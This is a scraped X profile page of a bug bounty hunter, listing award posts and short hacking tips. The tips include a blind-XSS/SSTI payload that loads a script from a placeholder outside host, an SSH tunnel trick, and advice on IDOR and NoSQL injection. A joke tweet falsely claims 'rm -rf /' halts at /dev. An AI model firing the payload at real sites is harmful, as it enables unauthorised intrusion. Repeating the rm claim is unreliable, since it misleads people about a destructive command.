bsysop (@bsysop) / X

bsysop

4,567 posts

bsysop

@bsysop

TOP10 @bugcrowd, TOP7 P1 Warrior 🚀 H1 AWC Champions 2024 and 2025 bugcrowd.com/bsysop 🤟🏻 hackerone.com/bsysop

Miami, FL

Joined May 2011

Pinned
bsysop
@bsysop
Feb 4, 2025
Super happy to see our research ranking #3 in @PortSwigger Top Web Hacking Techniques of 2024! 🚀 This one was a wild ride! Huge thanks to @_medusa_1_ & @sw33tLie for the amazing teamwork and to @Bugcrowd, who supported us! ❤️ What next? Keep tuned 👀🥷🏻 #BugBounty #Hacking
PortSwigger Research
@PortSwiggerRes
Feb 4, 2025
The results are in! We're proud to announce the Top ten web hacking techniques of 2024! portswigger.net/research/top-1…
10K
bsysop
@bsysop
May 18, 2022
I hope you are ready for this talk: "rm -rf /" will not delete all the Linux files, Linux will try to delete in alphabetical order, so it will reach "/dev/" first and it will fail before it can delete /home, /root, /var, etc ☠️
bsysop
@bsysop
Aug 13, 2022
Work hard until you get your face in a sticker at Defcon!
bsysop
@bsysop
Mar 28, 2024
This Dojo is a cool way to teach/learn about vulnerabilities. 🔥 It reveals the source code, demonstrates how servers parse the information in the backend, offers some hints, and if needed... the final solution. Amazing work @yeswehack ! 🤟🏻 🧵1/2 #BugBounty #BugBountyTips
26K
bsysop
@bsysop
Sep 25, 2021
You can send remote VPS requests to your local BURP using SSH. Run this in your computer connecting to your VPS ssh -R 8080:127.0.0.1:8080 root@VPS_IP -f -N And in your VPS you can run anything like curl URL -x http://127.0.0.1:8080 #BugBountyTips #BumBumTips #BugBounty
bsysop
@bsysop
Jun 8, 2020
If you find some key value like "5ede5ac4a5e083053eeeda3b" its probably MongoDB ObjectID. - Change it to a non-hex value to get errors and dig deeper. - When confirmed, go for IDOR and NoSQL Injection. #BugBounty #BugBountyTips #Pentesting
bsysop
@bsysop
Apr 16, 2024
2 minutes to Bypass a custom WAF??? That's disgunting @mcipekci 😂😂😂 #BugBounty
19K
bsysop
@bsysop
May 6, 2023
Yay, I was awarded a $6.000 debit on @Hacker0x01! hackerone.com/bsysop #TogetherWeHitHarder I’m selling the handler 👀
45K
bsysop
@bsysop
Mar 23, 2023
Buggy Awards 2022: Community Champion🦾 This was absolutely amazing, Thank you @Bugcrowd, you are the best ❤️🤟🏻 Congrats to the champions 🥷🏻 -> @ArmanSameer95 @GodfatherOrwa @mzamat123 #BugBounty #InfoSec #Bugcrowd
23K
bsysop
@bsysop
Jul 6, 2021
Add a SSTI payload to your Blind XSS payload, if you are lucky, you have a visual internal SSTI in a critical endpoint. ${{48*53}}`'";--><sCRIpt sRc=//your.oob></sCRIpt> #BugBountyTips #BugBounty
bsysop
@bsysop
Sep 22, 2020
Ok, @tumblr you got me! "From hero -> to zero" ✌🏻
bsysop
@bsysop
Jun 20, 2020
For extremely fast S3 Bucket Takeover test, an unknown tool called flumberboozle could save your time. It combine MASSDNS with automatic UPLOAD/REMOVE tests. bit.ly/2BlZo4a Test 20k permutations in 1m45s. Kudos to @fellchase for the brain!. #BugBounty #BugBountyTips
bsysop
@bsysop
Sep 23, 2024
14.000 @Bugcrowd points later, it feels like I've been hunting bugs forever (and maybe it's true) 😂 🤟🏻 #BugBounty
10K
bsysop
@bsysop
Mar 29, 2022
Finally, @Bugcrowd TOP19 all the time! 🤟🏻 Thanks to all amazing friends and great ASE/Support teams I meet during this journey, you are awesome ❤️! Learn with your mistakes, accept them and improve every day! 💪🏻 #BugBounty